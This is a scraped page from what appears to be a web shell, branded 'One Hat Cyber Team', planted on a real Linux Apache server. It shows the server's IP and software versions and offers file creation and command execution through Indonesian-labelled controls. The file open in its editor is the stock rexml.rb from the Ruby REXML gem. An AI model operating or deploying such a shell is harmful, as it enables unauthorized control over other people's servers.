⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.89
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
ruby
/
gems
/
3.0.0
/
gems
/
rexml-3.2.5
/
lib
/
rexml
/
Edit File: rexml.rb
# -*- coding: utf-8 -*- # frozen_string_literal: false # # \Module \REXML provides classes and methods for parsing, # editing, and generating XML. # # == Implementation # # \REXML: # - Is pure Ruby. # - Provides tree, stream, SAX2, pull, and lightweight APIs. # - Conforms to {XML version 1.0}[https://www.w3.org/TR/REC-xml/]. # - Fully implements {XPath version 1.0}[http://www.w3c.org/tr/xpath]. # - Is {non-validating}[https://www.w3.org/TR/xml/]. # - Passes 100% of the non-validating {Oasis tests}[http://www.oasis-open.org/committees/xml-conformance/xml-test-suite.shtml]. # # == In a Hurry? # # If you're somewhat familiar with XML # and have a particular task in mind, # you may want to see {the tasks pages}[doc/rexml/tasks/tocs/master_toc_rdoc.html]. # # == API # # Among the most important classes for using \REXML are: # - REXML::Document. # - REXML::Element. # module REXML COPYRIGHT = "Copyright © 2001-2008 Sean Russell <ser@germane-software.com>" DATE = "2008/019" VERSION = "3.2.5" REVISION = "" Copyright = COPYRIGHT Version = VERSION end
Simpan